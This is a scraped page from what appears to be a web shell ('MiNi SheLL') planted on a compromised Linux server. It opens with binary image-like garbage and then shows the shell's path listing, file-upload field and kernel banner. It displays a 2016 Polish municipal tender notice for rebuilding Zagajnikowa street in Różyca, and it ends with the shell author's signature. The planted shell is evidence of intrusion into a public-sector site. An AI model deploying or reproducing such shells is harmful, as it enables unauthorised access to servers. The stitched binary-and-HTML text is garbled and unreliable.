JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160208/27232-N-2016.html

<p class="kh_header"><b>Koluszki: Przebudowa ulicy Zagajnikowej  w Różycy wraz z infrastrukturą techniczną</b><br>
<b>Numer ogłoszenia: 27232 - 2016; data zamieszczenia: 08.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Koluszkach , ul. 11-go Listopada 65, 95-040 Koluszki, woj. łódzkie, tel. 044 7256700, faks 044 7145840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koluszki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulicy Zagajnikowej  w Różycy wraz z infrastrukturą techniczną.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem  zamówienia jest przebudowa ulicy  Zagajnikowej w Różycy  wraz 
z infrastrukturą  techniczną.   
2. W zakres prac do realizacji wchodzi:
1) rozebranie chodników,  krawężników, sfrezowanie istniejącej nawierzchni bitumicznej, wykonanie robót ziemnych, usunięcie humusu, drzew, wywiezienie zdemontowanych  materiałów. 
2) budowa kanalizacji deszczowej z rur PVC o średnicy DN 300 mm na długości: 555 m  wraz z przykanalikami z PVC  o średnicy 200 mm do wpustów deszczowych, studniami  rewizyjnymi z kręgów betonowych  o średnicy 1000 mm w ilości 13 sztuk, studniami chłonnymi, studzienkami  ściekowymi  DN  500 mm  w ilości 28 sztuk
3) budowa sieci wodociągowej  z rur  PE  o średnicy  110 mm  na  długości  525 m  wraz z  armaturą  wodociągową,
4) budowa kanalizacji sanitarnej z rur PCV  o  średnicy 200 mm na długości 2.108  mb  oraz przepompowni ścieków w ilości 1 sztuki, rurociągu tłocznego  z rur PE na długości 293 m, studni  rewizyjnych  o średnicy 1.000 mm  oraz  przyłączy  z rur PVC  na  długości 578 m
5) układanie kabli energetycznych o długości 1.100 mb wraz z  wstawieniem 24 słupów oświetleniowych oraz montażem 27 opraw oświetleniowych.
6) przebudowa istniejącej miedzianej  sieci  telekomunikacyjnej  i budowa  sieci światłowodowej telekomunikacyjnej,
7) wstawienie krawężników  i obrzeży betonowych,
8) wykonanie podbudowy oraz nawierzchni z mieszanek  mineralno - asfaltowych  na powierzchni: 12.785,5 m 2 
9) wykonanie podbudowy oraz  nawierzchni z kostki brukowej  na  chodnikach  i zjazdach na powierzchni:  5.4851,1 m 2, 
10) wykonanie na  wjazdach podbudowy oraz nawierzchni z  destruktu na powierzchni: 
500 m2, 
11) wykonanie robót  wykończeniowych  oraz  towarzyszących  realizowanej inwestycji,    
12) wykonanie oznakowania  pionowego oraz oznakowania  poziomego. 
3.  Miejsce realizacji: ulica  Zagajnikowa  w  Różycy  (droga gminna)  na całej długości  tj. od  skrzyżowania  z ulicą  Główną  (droga powiatowa) do skrzyżowania  
z ulicą Piotrkowską (droga wojewódzka).
Szczegółowy zakres do realizacji ujęty jest w: dokumentacjach projektowych, przedmiarach robót oraz Specyfikacjach technicznych Wykonania i Odbioru Robót Budowlanych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień  uzupełniających, o których  mowa  w  art. 67 ust. 1 pkt. 6 Ustawy Prawo Zamówień  Publicznych. 
Zamówienia  uzupełniające stanowiące nie więcej  niż  50 % zamówienia podstawowego  będzie udzielone tylko w przypadku, gdy zajdzie taka konieczność  i  spełnione  zostaną  przesłanki art. 67 ust.1 pkt. 6 Ustawy Prawo Zamówień  Publicznych</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.21.30-2, 45.23.32.20-7, 45.23.32.22-1, 45.23.23.00-5, 45.23.14.00-9, 45.23.32.90-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 60.000,00 zł   słownie:  sześćdziesiąt  tysięcy złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek  za  spełniony  na  podstawie  podpisanych  oświadczeń  o spełnieniu warunków udziału w postępowaniu, o których mowa  w  art. 22 ust.1 i  art. 24  Ustawy Prawo Zamówień  Publicznych, oraz gdy Wykonawca  załączy  aktualny  odpis  z właściwego rejestru lub z centralnej  ewidencji  i informacji  o działalności  gospodarczej, jeżeli  odrębne  przepisy wymagają  wpisu do rejestru, lub  ewidencji, w celu  wykazania  braku  podstaw  do  wykluczenia  w  oparciu  o art. 24 ust. 1 pkt. 2 Ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych,  wystawionego  nie  wcześniej  niż  6  miesięcy przed upływem  terminu  składania  ofert.
Na  podstawie załączonych dokumentów i oświadczeń Zamawiający zweryfikuje, czy  Wykonawca spełnia, czy nie spełnia warunki  udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten warunek za  spełniony na podstawie podpisanego  oświadczenia o spełnieniu warunków udziału w  postępowaniu, o których mowa  w  art. 22 ust.1 Ustawy Prawo Zamówień  Publicznych, oraz gdy Wykonawca   wykaże, że w okresie  ostatnich  pięciu  lat  przed upływem  terminu  składania   ofert, a jeżeli okres prowadzenia  działalności  jest  krótszy w tym okresie,  wykonywał:  
a) minimum  dwie realizacje polegające na budowie sieci kanalizacji sanitarnej o długości nie mniejszej niż 2.000 mb ( słownie: dwa tysiące metrów) - każde zadanie,
b) minimum dwie realizacje polegające na budowie, przebudowie nawierzchni mineralno -asfaltowych na powierzchni nie mniejszej niż 6.000 m2  ( słownie: sześć tysięcy  metrów kwadratowych) - każde zadanie.
Wymagania w zakresie posiadanego doświadczenia w różnych branżach tj. drogowej  i kanalizacji sanitarnej zawarte w punkcie 2 p.pkt. a, b  mogą  być  zrealizowane  przez  Wykonawcę  na jednym zadaniu, lub  na różnych  zadaniach.
Należy  podać  rodzaj robót, wartość oraz datę  i  miejsce wykonania  wraz z załączeniem  dowodów dotyczących najważniejszych  robót określających, czy roboty te zostały wykonane  w sposób należyty  oraz wskazujących, czy zostały wykonane  zgodnie z zasadami sztuki  budowlanej  i prawidłowo  ukończone.
Należy  podać rodzaj robót, wartość oraz datę i miejsce wykonania  wraz z załączeniem  dowodów dotyczących najważniejszych  robót określających, czy roboty te zostały wykonane  w sposób należyty  oraz wskazujących, czy zostały wykonane  zgodnie z zasadami sztuki  budowlanej  i prawidłowo  ukończone.
Na  podstawie załączonych dokumentów  i oświadczeń  Zamawiający zweryfikuje, czy  Wykonawca  spełnia, czy nie spełnia warunki udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na  podstawie podpisanego  oświadczenia  o  spełnieniu warunków udziału w postępowaniu, o  których mowa  w  art. 22 ust. 1 Ustawy Prawo Zamówień  Publicznych.
Na  podstawie załączonych dokumentów i oświadczeń Zamawiający zweryfikuje, czy  Wykonawca  spełnia, czy  nie spełnia  warunki  udziału  w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie  podpisanego oświadczenia o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień  Publicznych oraz, gdy Wykonawca dysponuje lub będzie dysponował  osobami, które będą uczestniczyć w wykonaniu  zamówienia, 
a  w szczególności będą  odpowiedzialne za kierowanie  robotami  budowlanymi  i osoby te  będą posiadały uprawnienia budowlane w specjalności:
a) drogowej,
b) instalacyjnej  w zakresie sieci  i urządzeń: wodociągowo - kanalizacyjnych. 
c) telekomunikacyjnej, 
d) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
Uprawnienia budowlane powinny być zgodnie z art. 12 a ustawy  z dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. z 2010 r. Nr  243  poz.1623 z późniejszymi  zmianami).
Na  podstawie załączonych dokumentów  i oświadczeń  Zamawiający zweryfikuje, czy  Wykonawca  spełnia, czy nie spełnia warunki udziału  w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten warunek za spełniony na podstawie podpisanego oświadczenie  
o spełnieniu warunków  udziału w postępowaniu, o których  mowa  w  art. 22 ust. 1 Ustawy Prawo Zamówień  Publicznych. 
Na  podstawie załączonych dokumentów i oświadczeń  Zamawiający zweryfikuje, czy  Wykonawca  spełnia, czy  nie spełnia  warunki  udziału  w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferty  
2. W przypadku, gdy Wykonawca będzie korzystał z wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do wykonania zamówienia innych podmiotów, zobowiązany jest przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu  zamówienia.
3. W przypadku, gdy podmioty występują wspólnie wykonawcy  powinni  ustanowić  pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo  reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia  publicznego. 
4. Kosztorys ofertowy wykonany na podstawie przedmiaru robót. Zamawiający  dopuszcza sporządzenie  uproszczonych  kosztorysów ofertowych. 
5. Dowód  wniesienia  wadium,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Wydłużenie okresu gwarancji i rękojmi - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający dopuszcza zmianę postanowień zawartej  umowy w stosunku do treści oferty, na podstawie której dokonano  wyboru  wykonawcy  w następujących przypadkach:
a)  w  uzasadnionych  przypadkach,  a w szczególności, gdy zajdzie: konieczność dokonania  zmian  w  projekcie  budowlanym, przekroczenia terminów  wydawania przez organy administracji: decyzji i zezwoleń  itp., wystąpienia znalezisk archeologicznych, wyjątkowo  niesprzyjających  warunków  atmosferycznych, geologicznych, hydrologicznych,  nieprzewidzianych kolizji  z urządzeniami infrastruktury, w  przypadku działania siły wyższej w rozumieniu przepisów Kodeksu Cywilnego;  lub  w innych okolicznościach  niezależnych  od  Zamawiającego  lub  Wykonawcy, kiedy  konieczna  będzie  zmiana  terminu  realizacji  zamówienia, Zamawiający na  pisemny  wniosek  Wykonawcy  może  przedłużyć  termin  realizacji  zamówienia,
b) w innych  uzasadnionych  przypadkach, gdy zajdzie konieczność  wprowadzenia  do  umowy koniecznych  zmian  wynikających  z okoliczności,  których nie  można  było  przewidzieć  w chwili zawarcia  umowy, Zamawiający za  zgodą  Wykonawcy  może dokonać  takiej  zmiany.
c) w przypadku, gdy zmiany postanowień zawartej umowy będą  korzystne dla Zamawiającego, a  zmiany  te wynikły  w  trakcie  realizacji zamówienia, Zamawiający  za zgodą  Wykonawcy może dokonać  takiej zmiany.
d) w przypadku, gdy zajdzie uzasadniona konieczność ograniczenia, lub rezygnacji 
z  części  umownego  zakresu  robót, Zamawiający zastrzega sobie możliwość zmniejszenia  wynagrodzenia  umownego  poprzez korektę  wartości  ryczałtowej  przedmiotu umowy  po  cenach  i stawkach  wynikających  z kosztorysu ofertowego  Wykonawcy,
e) w przypadku, gdy zajdzie uzasadniona konieczność wykonania  robót zamiennych  mających  służyć  właściwej  realizacji zamówienia, Zamawiający zastrzega sobie możliwość zmiany umówionego  wynagrodzenia wynikającego  z porównania  rozmiaru i wartości  robót zamiennych  z robotami  przewidzianymi do  realizacji  w dokumentacji  projektowej i zawartej umowie z zastrzeżeniem nieprzekraczalności  ceny ofertowej, która  będzie stanowić maksymalną graniczną  kwotę umówionego wynagrodzenia.  
W  przypadku wystąpienia robót  dodatkowych  lub uzupełniających  nieobjętych  niniejszym zamówieniem, niezbędnym  do  prawidłowego wykonania umowy, roboty te zostaną rozliczone zostaną w oparciu o ceny i wskaźniki cenotwórcze zaproponowane przez wykonawcę w kosztorysie szczegółowym. Zlecenie wykonania robót  dodatkowych lub uzupełniających dokonane  zostanie w  oparciu o odrębną umowę.  
f) w przypadku ustawowej  zmiany  stawki  podatku  od  towarów i  usług ( VAT) cena netto pozostanie bez zmian, a  kwota podatku VAT i wartość  brutto zostanie  odpowiednio  skorygowana zgodnie z aktualnie obowiązującymi  przepisami  podatkowymi.
2) W razie zaistnienia  zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od dnia  powzięcia wiadomości o tych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koluszki.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski  w Koluszkach przy ul. 11 Listopada 65 pok nr 203.
Koszt  SIWZ w  wersji papierowej: 100,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2016 godzina 09:30, miejsce: kancelaria Urzędu Miejskiego w Koluszkach  przy ul. 11  Listopada 65.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie zostanie dofinansowane ze środków budżetu państwa z Programu  Rozwoju  Gminnej  i  Powiatowej  Infrastruktury Drogowej na lata 2016 -2020.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com